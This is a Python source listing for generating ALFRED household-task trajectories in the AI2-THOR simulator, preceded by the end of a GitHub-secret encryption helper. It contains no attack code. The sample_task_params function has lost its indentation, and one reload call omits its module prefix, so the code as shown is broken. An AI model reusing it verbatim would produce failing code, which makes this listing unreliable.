
    Returns the ciphertext base64-encoded, as the GitHub secrets API expects.
    """
    from base64 import b64encode
    repo_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
    ciphertext = public.SealedBox(repo_key).encrypt(secret_value.encode("utf-8"))
    return b64encode(ciphertext).decode("utf-8")
|
generate_trajs.py | import os
import sys
import time
import multiprocessing as mp
import json
import random
import shutil
import argparse
import numpy as np
import pandas as pd
from collections import OrderedDict
from datetime import datetime
from sacred import Ingredient, Experiment
from alfred.env.thor_env import ThorEnv
from alfred.gen import constants
from alfred.gen.agents.deterministic_planner_agent import DeterministicPlannerAgent
from alfred.gen.game_states.task_game_state_full_knowledge import TaskGameStateFullKnowledge
from alfred.gen.utils import video_util, dataset_management_util
from alfred.utils import helper_util
# Sacred experiment wiring: 'args' ingredient carries the CLI configuration.
args_ingredient = Ingredient('args')
ex = Experiment('generate_trajs', ingredients=[args_ingredient])
# params
# Per-trajectory output locations: frames directory and metadata file name.
RAW_IMAGES_FOLDER = 'raw_images/'
DATA_JSON_FILENAME = 'traj_data.json'
# video saver
video_saver = video_util.VideoSaver()
# structures to help with constraint enforcement.
# Which sampling variables each goal type constrains (note: 'movable' only for
# the movable-receptacle goal).
goal_to_required_variables = {
    "pick_and_place_simple": {"pickup", "receptacle", "scene"},
    "pick_two_obj_and_place": {"pickup", "receptacle", "scene"},
    "look_at_obj_in_light": {"pickup", "receptacle", "scene"},
    "pick_clean_then_place_in_recep": {"pickup", "receptacle", "scene"},
    "pick_heat_then_place_in_recep": {"pickup", "receptacle", "scene"},
    "pick_cool_then_place_in_recep": {"pickup", "receptacle", "scene"},
    "pick_and_place_with_movable_recep": {"pickup", "movable", "receptacle", "scene"}}
# Object-affordance category the pickup object must have for each goal.
goal_to_pickup_type = {
    'pick_heat_then_place_in_recep': 'Heatable',
    'pick_cool_then_place_in_recep': 'Coolable',
    'pick_clean_then_place_in_recep': 'Cleanable'}
# Affordance required of the receptacle for each goal.
goal_to_receptacle_type = {'look_at_obj_in_light': "Toggleable"}
# Receptacles excluded per goal (e.g. the appliance used by the goal itself).
goal_to_invalid_receptacle = {
    'pick_heat_then_place_in_recep': {'Microwave'},
    'pick_cool_then_place_in_recep': {'Fridge'},
    'pick_clean_then_place_in_recep': {'SinkBasin'},
    'pick_two_obj_and_place': {'CoffeeMachine', 'ToiletPaperHanger', 'HandTowelHolder'}}
# Scene/object indexes, filled in elsewhere at startup — empty here.
scene_id_to_objs = {}
obj_to_scene_ids = {}
scenes_for_goal = {g: [] for g in constants.GOALS}
scene_to_type = {}
def sample_task_params(
succ_traj, full_traj, fail_traj,
goal_candidates, pickup_candidates, movable_candidates,
receptacle_candidates, scene_candidates, inject_noise=10):
# Get the current conditional distributions of all variables (goal/pickup/receptacle/scene).
goal_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) + succ_traj.loc[
(succ_traj['pickup'].isin(pickup_candidates) if 'pickup' in goal_to_required_variables[c] else True) &
(succ_traj['movable'].isin(movable_candidates) if 'movable' in goal_to_required_variables[c] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates) if 'receptacle' in goal_to_required_variables[c] else True)
& (succ_traj['scene'].isin(scene_candidates) if 'scene' in goal_to_required_variables[c] else True)]
['goal'].tolist().count(c))) # Conditional.
* (1 / (1 + succ_traj['goal'].tolist().count(c))) # Prior.
for c in goal_candidates]
goal_probs = [w / sum(goal_weight) for w in goal_weight]
pickup_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['pickup'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['pickup'].tolist().count(c)))
for c in pickup_candidates]
pickup_probs = [w / sum(pickup_weight) for w in pickup_weight]
movable_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['movable'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['movable'].tolist().count(c)))
for c in movable_candidates]
movable_probs = [w / sum(movable_weight) for w in movable_weight]
receptacle_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['receptacle'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['receptacle'].tolist().count(c)))
for c in receptacle_candidates]
receptacle_probs = [w / sum(receptacle_weight) for w in receptacle_weight]
scene_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True)]
['scene'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['scene'].tolist().count(c)))
for c in scene_candidates]
scene_probs = [w / sum(scene_weight) for w in scene_weight]
# Calculate the probability difference between each value and the maximum so we can iterate over them to find a
# next-best candidate to sample subject to the constraints of knowing which will fail.
diffs = [("goal", goal_candidates[idx], goal_probs[idx] - min(goal_probs))
for idx in range(len(goal_candidates)) if len(goal_candidates) > 1]
diffs.extend([("pickup", pickup_candidates[idx], pickup_probs[idx] - min(pickup_probs))
for idx in range(len(pickup_candidates)) if len(pickup_candidates) > 1])
diffs.extend([("movable", movable_candidates[idx], movable_probs[idx] - min(movable_probs))
for idx in range(len(movable_candidates)) if len(movable_candidates) > 1])
diffs.extend([("receptacle", receptacle_candidates[idx], receptacle_probs[idx] - min(receptacle_probs))
for idx in range(len(receptacle_candidates)) if len(receptacle_candidates) > 1])
diffs.extend([("scene", scene_candidates[idx], scene_probs[idx] - min(scene_probs))
for idx in range(len(scene_candidates)) if len(scene_candidates) > 1])
# Iteratively pop the next biggest difference until we find a combination that is valid (e.g., not already
# flagged as impossible by the simulator).
variable_value_by_diff = {}
diffs_as_keys = [] # list of diffs; index into list will be used as key values.
for _, _, diff in diffs:
already_keyed = False
for existing_diff in diffs_as_keys:
if np.isclose(existing_diff, diff):
already_keyed = True
break
if not already_keyed:
diffs_as_keys.append(diff)
for variable, value, diff in diffs:
key = None
for kidx in range(len(diffs_as_keys)):
if np.isclose(diffs_as_keys[kidx], diff):
key = kidx
if key not in variable_value_by_diff:
variable_value_by_diff[key] = []
variable_value_by_diff[key].append((variable, value))
for key, diff in sorted(enumerate(diffs_as_keys), key=lambda x: x[1], reverse=True):
variable_value = variable_value_by_diff[key]
random.shuffle(variable_value)
for variable, value in variable_value:
# Select a goal.
if variable == "goal":
gtype = value
# print("sampled goal '%s' with prob %.4f" % (gtype, goal_probs[goal_candidates.index(gtype)]))
_goal_candidates = [gtype]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a pickup object.
elif variable == "pickup":
pickup_obj = value
# print("sampled pickup object '%s' with prob %.4f" %
# (pickup_obj, pickup_probs[pickup_candidates.index(pickup_obj)]))
_pickup_candidates = [pickup_obj]
_goal_candidates = goal_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a movable object.
elif variable == "movable":
movable_obj = value
# print("sampled movable object '%s' with prob %.4f" %
# (movable_obj, movable_probs[movable_candidates.index(movable_obj)]))
_movable_candidates = [movable_obj]
_goal_candidates = [g for g in goal_candidates if g == 'pick_and_place_with_movable_recep']
_pickup_candidates = pickup_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a receptacle.
elif variable == "receptacle":
receptacle_obj = value
# print("sampled receptacle object '%s' with prob %.4f" %
# (receptacle_obj, receptacle_probs[receptacle_candidates.index(receptacle_obj)]))
_receptacle_candidates = [receptacle_obj]
_goal_candidates = goal_candidates[:]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a scene.
else:
sampled_scene = value
# print("sampled scene %s with prob %.4f" %
# (sampled_scene, scene_probs[scene_candidates.index(sampled_scene)]))
_scene_candidates = [sampled_scene]
_goal_candidates = goal_candidates[:]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
# Perform constraint propagation to determine whether this is a valid assignment.
propagation_finished = False
while not propagation_finished:
assignment_lens = (len(_goal_candidates), len(_pickup_candidates), len(_movable_candidates),
len(_receptacle_candidates), len(_scene_candidates))
# Constraints on goal.
_goal_candidates = [g for g in _goal_candidates if
(g not in goal_to_pickup_type or
len(set(_pickup_candidates).intersection( # Pickup constraint.
constants.VAL_ACTION_OBJECTS[goal_to_pickup_type[g]])) > 0)
and (g not in goal_to_receptacle_type or
np.any([r in constants.VAL_ACTION_OBJECTS[goal_to_receptacle_type[g]]
for r in _receptacle_candidates])) # Valid by goal receptacle const.
and (g not in goal_to_invalid_receptacle or
len(set(_receptacle_candidates).difference(
goal_to_invalid_receptacle[g])) > 0) # Invalid by goal receptacle const.
and len(set(_scene_candidates).intersection(
scenes_for_goal[g])) > 0 # Scene constraint
]
# Define whether to consider constraints for each role based on current set of candidate goals.
pickup_constrained = np.any(["pickup" in goal_to_required_variables[g] for g in _goal_candidates])
movable_constrained = np.any(["movable" in goal_to_required_variables[g] for g in _goal_candidates])
receptacle_constrained = np.any(["receptacle" in goal_to_required_variables[g]
for g in _goal_candidates])
scene_constrained = np.any(["scene" in goal_to_required_variables[g] for g in _goal_candidates])
# Constraints on pickup obj.
_pickup_candidates = [p for p in _pickup_candidates if
np.any([g not in goal_to_pickup_type or
p in constants.VAL_ACTION_OBJECTS[goal_to_pickup_type[g]]
for g in _goal_candidates]) # Goal constraint.
and (not movable_constrained or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[m]
for m in _movable_candidates])) # Movable constraint.
and (not receptacle_constrained or
np.any([r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
p in constants.VAL_RECEPTACLE_OBJECTS[r]
for r in _receptacle_candidates])) # Receptacle constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[p]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on movable obj.
_movable_candidates = [m for m in _movable_candidates if
'pick_and_place_with_movable_recep' in _goal_candidates # Goal constraint
and (not pickup_constrained or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[m]
for p in _pickup_candidates])) # Pickup constraint.
and (not receptacle_constrained or
np.any([r in constants.VAL_RECEPTACLE_OBJECTS and
m in constants.VAL_RECEPTACLE_OBJECTS[r]
for r in _receptacle_candidates])) # Receptacle constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[m]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on receptacle obj.
_receptacle_candidates = [r for r in _receptacle_candidates if
np.any([(g not in goal_to_receptacle_type or
r in constants.VAL_ACTION_OBJECTS[goal_to_receptacle_type[g]]) and
(g not in goal_to_invalid_receptacle or
r not in goal_to_invalid_receptacle[g])
for g in _goal_candidates]) # Goal constraint.
and (not receptacle_constrained or
r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[r]
for p in _pickup_candidates])) # Pickup constraint.
and (not movable_constrained or
r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
np.any([m in constants.VAL_RECEPTACLE_OBJECTS[r]
for m in _movable_candidates])) # Movable constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[r]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on scene.
_scene_candidates = [s for s in _scene_candidates if
np.any([s in scenes_for_goal[g]
for g in _goal_candidates]) # Goal constraint.
and (not pickup_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[p]]
for p in _pickup_candidates])) # Pickup constraint.
and (not movable_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[m]]
for m in _movable_candidates])) # Movable constraint.
and (not receptacle_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[r]]
for r in _receptacle_candidates])) # Receptacle constraint.
]
if assignment_lens == (len(_goal_candidates), len(_pickup_candidates), len(_movable_candidates),
len(_receptacle_candidates), len(_scene_candidates)):
propagation_finished = True
candidate_lens = {"goal": len(_goal_candidates), "pickup": len(_pickup_candidates),
"movable": len(_movable_candidates), "receptacle": len(_receptacle_candidates),
"scene": len(_scene_candidates)}
if candidate_lens["goal"] == 0:
# print("Goal over-constrained; skipping")
continue
if np.all([0 in [candidate_lens[v] for v in goal_to_required_variables[g]] for g in _goal_candidates]):
continue
# Ensure some combination of the remaining constraints is not in failures and is not already populated
# by the target number of repeats.
failure_ensured = True
full_ensured = True
for g in _goal_candidates:
pickup_iter = _pickup_candidates if "pickup" in goal_to_required_variables[g] else ["None"]
for p in pickup_iter:
movable_iter = _movable_candidates if "movable" in goal_to_required_variables[g] else ["None"]
for m in movable_iter:
receptacle_iter = _receptacle_candidates if "receptacle" in goal_to_required_variables[g] \
else ["None"]
for r in receptacle_iter:
scene_iter = _scene_candidates if "scene" in goal_to_required_variables[g] else ["None"]
for s in scene_iter:
if (g, p, m, r, s) not in fail_traj:
failure_ensured = False
if (g, p, m, r, s) not in full_traj:
full_ensured = False
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if failure_ensured:
continue
if full_ensured:
continue
if candidate_lens["goal"] > 1 or np.any([np.any([candidate_lens[v] > 1
for v in goal_to_required_variables[g]])
for g in _goal_candidates]):
task_sampler = sample_task_params(succ_traj, full_traj, fail_traj,
_goal_candidates, _pickup_candidates, _movable_candidates,
_receptacle_candidates, _scene_candidates)
sampled_task = next(task_sampler)
if sampled_task is None:
continue
else:
g = _goal_candidates[0]
p = _pickup_candidates[0] if "pickup" in goal_to_required_variables[g] else "None"
m = _movable_candidates[0] if "movable" in goal_to_required_variables[g] else "None"
r = _receptacle_candidates[0] if "receptacle" in goal_to_required_variables[g] else "None"
s = _scene_candidates[0] if "scene" in goal_to_required_variables[g] else "None"
sampled_task = (g, p, m, r, int(s))
yield sampled_task
yield None # Discovered that there are no valid assignments remaining.
def print_successes(succ_traj):
    """Pretty-print the table of successful trajectories between '#' separators."""
    banner_top = "###################################\n"
    banner_bottom = "\n##################################"
    print(banner_top)
    print("Successes: ")
    print(succ_traj)
    print(banner_bottom)
def generate(args):
    """Main generation loop: sample task tuples and roll out planner trajectories.

    Builds object/scene lookup tables (mutating the module-level dicts
    scene_id_to_objs, obj_to_scene_ids, scenes_for_goal, scene_to_type),
    pre-loads known successes/failures from disk, then loops forever:
    sample a (goal, pickup, movable, receptacle, scene) tuple, try to plan
    and execute it in THOR, and record success/failure bookkeeping.

    Args:
        args: AttrDict of config values (save_path, x_display, num_threads,
            repeats_per_cond, trials_before_fail, force_unsave, debug,
            just_examine, async_load_every_n_samples).
    """
    # settings
    constants.DATA_SAVE_PATH = args.save_path
    print("Force Unsave Data: %s" % str(args.force_unsave))

    # set x_display (a list/tuple means "pick one of several X servers at random")
    if isinstance(args.x_display, (list, tuple)):
        args.x_display = random.choice(args.x_display)

    # Set up data structure to track dataset balance and use for selecting next parameters.
    # In actively gathering data, we will try to maximize entropy for each (e.g., uniform spread of goals,
    # uniform spread over patient objects, uniform recipient objects, and uniform scenes).
    succ_traj = pd.DataFrame(columns=["goal", "pickup", "movable", "receptacle", "scene"])

    # objects-to-scene and scene-to-objects database
    for scene_type, ids in constants.SCENE_TYPE.items():
        for id in ids:
            obj_json_file = os.path.join(
                constants.LAYOUTS_PATH, 'FloorPlan%d-objects.json' % id)
            with open(obj_json_file, 'r') as of:
                scene_objs = json.load(of)

            id_str = str(id)
            scene_id_to_objs[id_str] = scene_objs
            for obj in scene_objs:
                if obj not in obj_to_scene_ids:
                    obj_to_scene_ids[obj] = set()
                obj_to_scene_ids[obj].add(id_str)

    # scene-goal database: which scene ids are valid for each goal type.
    for g in constants.GOALS:
        for st in constants.GOALS_VALID[g]:
            scenes_for_goal[g].extend([str(s) for s in constants.SCENE_TYPE[st]])
        scenes_for_goal[g] = set(scenes_for_goal[g])

    # scene-type database
    for st in constants.SCENE_TYPE:
        for s in constants.SCENE_TYPE[st]:
            scene_to_type[str(s)] = st

    # pre-populate counts in this structure using saved trajectories path.
    succ_traj, full_traj = dataset_management_util.load_successes_from_disk(
        args.save_path, succ_traj, args.just_examine, args.repeats_per_cond)
    if args.just_examine:
        # Inspection-only mode: report what has been gathered and stop.
        print_successes(succ_traj)
        return

    # pre-populate failed trajectories.
    fail_traj = dataset_management_util.load_fails_from_disk(args.save_path)
    print("Loaded %d known failed tuples" % len(fail_traj))

    # create env and agent
    env = ThorEnv(x_display=args.x_display)
    game_state = TaskGameStateFullKnowledge(env)
    agent = DeterministicPlannerAgent(thread_id=0, game_state=game_state)

    errors = {}  # map from error strings to counts, to be shown after every failure.
    goal_candidates = constants.GOALS[:]
    # Union objects that can be placed.
    pickup_candidates = list(set().union(*[constants.VAL_RECEPTACLE_OBJECTS[obj]
                                           for obj in constants.VAL_RECEPTACLE_OBJECTS]))
    pickup_candidates = [
        p for p in pickup_candidates if constants.OBJ_PARENTS[p] in obj_to_scene_ids]
    movable_candidates = list(
        set(constants.MOVABLE_RECEPTACLES).intersection(obj_to_scene_ids.keys()))
    receptacle_candidates = [
        obj for obj in constants.VAL_RECEPTACLE_OBJECTS
        if obj not in constants.MOVABLE_RECEPTACLES and obj in obj_to_scene_ids] + \
        [obj for obj in constants.VAL_ACTION_OBJECTS["Toggleable"]
         if obj in obj_to_scene_ids]

    # toaster isn't interesting in terms of producing linguistic diversity
    receptacle_candidates.remove('Toaster')
    receptacle_candidates.sort()

    scene_candidates = list(scene_id_to_objs.keys())

    n_until_load_successes = args.async_load_every_n_samples
    print_successes(succ_traj)
    task_sampler = sample_task_params(
        succ_traj, full_traj, fail_traj,
        goal_candidates, pickup_candidates, movable_candidates,
        receptacle_candidates, scene_candidates)

    # main generation loop
    # keeps trying out new task tuples as trajectories either fail or suceed
    while True:
        sampled_task = next(task_sampler)
        print(sampled_task)  # DEBUG
        if sampled_task is None:
            sys.exit("No valid tuples left to sample (all are known to fail or already have %d trajectories" % args.repeats_per_cond)
        gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene = sampled_task
        print("sampled tuple: " + str((gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene)))

        tries_remaining = args.trials_before_fail
        # only try to get the number of trajectories left to make this tuple full.
        target_remaining = args.repeats_per_cond - len(
            succ_traj.loc[(succ_traj['goal'] == gtype) &
                          (succ_traj['pickup'] == pickup_obj) &
                          (succ_traj['movable'] == movable_obj) &
                          (succ_traj['receptacle'] == receptacle_obj) &
                          (succ_traj['scene'] == str(sampled_scene))])
        # count of errors related to placement failure for no valid positions.
        num_place_fails = 0

        # continue until we're (out of tries + have never succeeded)
        # or (have gathered the target number of instances)
        while tries_remaining > 0 and target_remaining > 0:
            # environment setup
            constants.pddl_goal_type = gtype
            print("PDDLGoalType: " + constants.pddl_goal_type)
            task_id = create_dirs(
                gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene)

            # setup data dictionary
            setup_data_dict()
            constants.data_dict['task_id'] = task_id
            constants.data_dict['task_type'] = constants.pddl_goal_type
            constants.data_dict['dataset_params']['video_frame_rate'] = constants.VIDEO_FRAME_RATE

            # plan & execute
            try:
                # Agent reset to new scene.
                constraint_objs = {
                    'repeat': [
                        (constants.OBJ_PARENTS[pickup_obj],  # Generate multiple parent objs.
                         np.random.randint(2 if gtype == "pick_two_obj_and_place" else 1,
                                           constants.PICKUP_REPEAT_MAX + 1))],
                    'sparse': [
                        (receptacle_obj.replace('Basin', ''),
                         num_place_fails * constants.RECEPTACLE_SPARSE_POINTS)]}
                if movable_obj != "None":
                    constraint_objs['repeat'].append(
                        (movable_obj, np.random.randint(1, constants.PICKUP_REPEAT_MAX + 1)))
                # Also duplicate distractor objects present in the sampled scene.
                for obj_type in scene_id_to_objs[str(sampled_scene)]:
                    if (obj_type in pickup_candidates and
                            obj_type != constants.OBJ_PARENTS[pickup_obj] and
                            obj_type != movable_obj):
                        constraint_objs['repeat'].append(
                            (obj_type,
                             np.random.randint(1, constants.MAX_NUM_OF_OBJ_INSTANCES + 1)))
                if gtype in goal_to_invalid_receptacle:
                    constraint_objs['empty'] = [
                        (r.replace('Basin', ''),
                         num_place_fails * constants.RECEPTACLE_EMPTY_POINTS)
                        for r in goal_to_invalid_receptacle[gtype]]
                constraint_objs['seton'] = []
                if gtype == 'look_at_obj_in_light':
                    constraint_objs['seton'].append((receptacle_obj, False))
                if num_place_fails > 0:
                    print("Failed %d placements in the past; increased free point constraints: " % num_place_fails + str(constraint_objs))
                scene_info = {'scene_num': sampled_scene,
                              'random_seed': random.randint(0, 2 ** 32)}
                info = agent.reset(scene=scene_info,
                                   objs=constraint_objs)

                # Problem initialization with given constraints.
                task_objs = {'pickup': pickup_obj}
                if movable_obj != "None":
                    task_objs['mrecep'] = movable_obj
                if gtype == "look_at_obj_in_light":
                    task_objs['toggle'] = receptacle_obj
                else:
                    task_objs['receptacle'] = receptacle_obj
                agent.setup_problem({'info': info}, scene=scene_info, objs=task_objs)

                # Now that objects are in their initial places, record them.
                object_poses = [{'objectName': obj['name'].split('(Clone)')[0],
                                 'position': obj['position'],
                                 'rotation': obj['rotation']}
                                for obj in env.last_event.metadata['objects'] if obj['pickupable']]
                dirty_and_empty = gtype == 'pick_clean_then_place_in_recep'
                object_toggles = [{'objectType': o, 'isOn': v}
                                  for o, v in constraint_objs['seton']]
                constants.data_dict['scene']['object_poses'] = object_poses
                constants.data_dict['scene']['dirty_and_empty'] = dirty_and_empty
                constants.data_dict['scene']['object_toggles'] = object_toggles

                # Pre-restore the scene to cause objects to "jitter" like they will when the episode is replayed
                # based on stored object and toggle info. This should put objects closer to the final positions they'll
                # be inlay at inference time (e.g., mugs fallen and broken, knives fallen over, etc.).
                print("Performing reset via thor_env API")
                env.reset(sampled_scene)
                print("Performing restore via thor_env API")
                env.restore_scene(object_poses, object_toggles, dirty_and_empty)
                event = env.step(dict(constants.data_dict['scene']['init_action']))

                terminal = False
                while not terminal and agent.current_frame_count <= constants.MAX_EPISODE_LENGTH:
                    action_dict = agent.get_action(None)
                    agent.step(action_dict)
                    reward, terminal = agent.get_reward()
                dump_data_dict()
                save_video()
            except Exception as e:
                import traceback
                traceback.print_exc()
                print("Error: " + repr(e))
                print("Invalid Task: skipping...")
                if args.debug:
                    print(traceback.format_exc())

                deleted = delete_save(args.num_threads > 0)
                # another thread is filling this task successfully, so leave it alone.
                if not deleted:
                    target_remaining = 0  # stop trying to do this task.
                else:
                    if str(e) == "API Action Failed: No valid positions to place object found":
                        # Try increasing the space available on sparse and empty flagged objects.
                        num_place_fails += 1
                        tries_remaining -= 1
                    else:  # generic error
                        tries_remaining -= 1

                    # Tally truncated error strings and show the distribution of frequent errors.
                    estr = str(e)
                    if len(estr) > 120:
                        estr = estr[:120]
                    if estr not in errors:
                        errors[estr] = 0
                    errors[estr] += 1
                    print("%%%%%%%%%%")
                    es = sum([errors[er] for er in errors])
                    print("\terrors (%d):" % es)
                    for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
                        if v / es < 0.01:  # stop showing below 1% of errors.
                            break
                        print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
                    print("%%%%%%%%%%")
                continue

            if args.force_unsave:
                delete_save(args.num_threads > 0)

            # add to save structure.
            succ_traj = succ_traj.append({
                "goal": gtype,
                "movable": movable_obj,
                "pickup": pickup_obj,
                "receptacle": receptacle_obj,
                "scene": str(sampled_scene)}, ignore_index=True)
            target_remaining -= 1
            # on success, add more tries for future successes
            tries_remaining += args.trials_before_fail

        # if this combination resulted in a certain number of failures with no successes,
        # flag it as not possible.
        if tries_remaining == 0 and target_remaining == args.repeats_per_cond:
            new_fails = [(gtype, pickup_obj, movable_obj, receptacle_obj, str(sampled_scene))]
            fail_traj = dataset_management_util.load_fails_from_disk(
                args.save_path, to_write=new_fails)
            print("%%%%%%%%%%")
            print("failures (%d)" % len(fail_traj))
            # print("\t" + "\n\t".join([str(ft) for ft in fail_traj]))
            print("%%%%%%%%%%")

        # if this combination gave us the repeats we wanted, note it as filled.
        if target_remaining == 0:
            full_traj.add((gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene))

        # if we're sharing with other processes,
        # reload successes from disk to update local copy with others' additions.
        if args.num_threads > 0:
            if n_until_load_successes > 0:
                n_until_load_successes -= 1
            else:
                print("Reloading trajectories from disk because of parallel processes...")
                succ_traj = pd.DataFrame(columns=succ_traj.columns)  # Drop all rows.
                succ_traj, full_traj = load_successes_from_disk(
                    args.save_path, succ_traj, False, args.repeats_per_cond)
                print("... Loaded %d trajectories" % len(succ_traj.index))
                n_until_load_successes = args.async_load_every_n_samples
                print_successes(succ_traj)
                # Restart sampler so it sees the refreshed success/full bookkeeping.
                task_sampler = sample_task_params(
                    succ_traj, full_traj, fail_traj,
                    goal_candidates, pickup_candidates, movable_candidates,
                    receptacle_candidates, scene_candidates)
                print("... Created fresh instance of sample_task_params generator")
def create_dirs(gtype, pickup_obj, movable_obj, receptacle_obj, scene_num):
    """Create the raw-image output directory for a new trial.

    Sets constants.save_path as a side effect (other helpers read it).

    Args:
        gtype: Goal type name.
        pickup_obj, movable_obj, receptacle_obj: Object names for the task tuple.
        scene_num: Integer scene id.

    Returns:
        The generated timestamp-based task id string.
    """
    task_id = 'trial_T' + datetime.now().strftime("%Y%m%d_%H%M%S_%f")
    save_name = '%s-%s-%s-%s-%d' % (
        gtype, pickup_obj, movable_obj, receptacle_obj, scene_num) + '/' + task_id

    constants.save_path = os.path.join(constants.DATA_SAVE_PATH, save_name, RAW_IMAGES_FOLDER)
    # exist_ok avoids the check-then-create race when several generator
    # processes (args.num_threads > 1) create sibling directories concurrently.
    os.makedirs(constants.save_path, exist_ok=True)

    print("Saving images to: " + constants.save_path)
    return task_id
def save_video():
    """Stitch the trial's saved raw frames into a video.mp4 next to the images folder."""
    frame_glob = constants.save_path + '*.png'
    out_dir = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
    video_saver.save(frame_glob, os.path.join(out_dir, 'video.mp4'))
def setup_data_dict():
    """Reset constants.data_dict to the empty trajectory-record skeleton."""
    record = OrderedDict()
    record['task_id'] = ""
    record['task_type'] = ""
    record['scene'] = {
        'floor_plan': "", 'random_seed': -1, 'scene_num': -1, 'init_action': [],
        'object_poses': [], 'dirty_and_empty': None, 'object_toggles': []}
    record['plan'] = {'high_pddl': [], 'low_actions': []}
    record['images'] = []
    record['template'] = {'task_desc': "", 'high_descs': []}
    record['pddl_params'] = {'object_target': -1, 'object_sliced': -1,
                             'parent_target': -1, 'toggle_target': -1,
                             'mrecep_target': -1}
    record['dataset_params'] = {'video_frame_rate': -1}
    record['pddl_state'] = []
    constants.data_dict = record
def dump_data_dict():
    """Serialize constants.data_dict as pretty-printed JSON beside the raw images folder."""
    out_dir = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
    out_file = os.path.join(out_dir, DATA_JSON_FILENAME)
    with open(out_file, 'w') as fp:
        json.dump(constants.data_dict, fp, sort_keys=True, indent=4)
def delete_save(in_parallel):
    """Remove the current trial's save folder after a failed episode.

    Args:
        in_parallel: True when other generator processes share the save path,
            in which case a removal failure is treated as another process
            owning (and successfully filling) this task.

    Returns:
        False when running in parallel and the folder could not be removed;
        True otherwise.

    Raises:
        OSError: When removal fails and we are NOT running in parallel.
    """
    save_folder = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
    if os.path.exists(save_folder):
        try:
            shutil.rmtree(save_folder)
        except OSError:
            if in_parallel:  # another thread succeeded at this task while this one failed.
                return False
            # Bare re-raise preserves the original traceback; not running in
            # parallel, so this is an actual error.
            raise
    return True
def parallel_generate(args):
    """Spawn args.num_threads generate() worker processes and wait for all of them."""
    workers = [mp.Process(target=generate, args=(args,)) for _ in range(args.num_threads)]
    try:
        for worker in workers:
            worker.start()
            # Stagger startups slightly so workers don't race on shared setup.
            time.sleep(0.1)
    finally:
        for worker in workers:
            worker.join()
@args_ingredient.config
def cfg_args():
    # NOTE: this is a sacred config scope -- variable names become config keys
    # and the comment above each assignment becomes its help text.
    # don't save any data (for debugging purposes)
    force_unsave = False
    # debug mode (prints full tracebacks on episode failures)
    debug = False
    # where to save the generated data (joined under constants.ET_DATA)
    name = None
    # X server number (a list/tuple means pick one at random per process)
    x_display = '0'
    # just examine what data is gathered; don't gather more
    just_examine = False
    # number of processes (>1 means to run in parallel)
    num_threads = 1
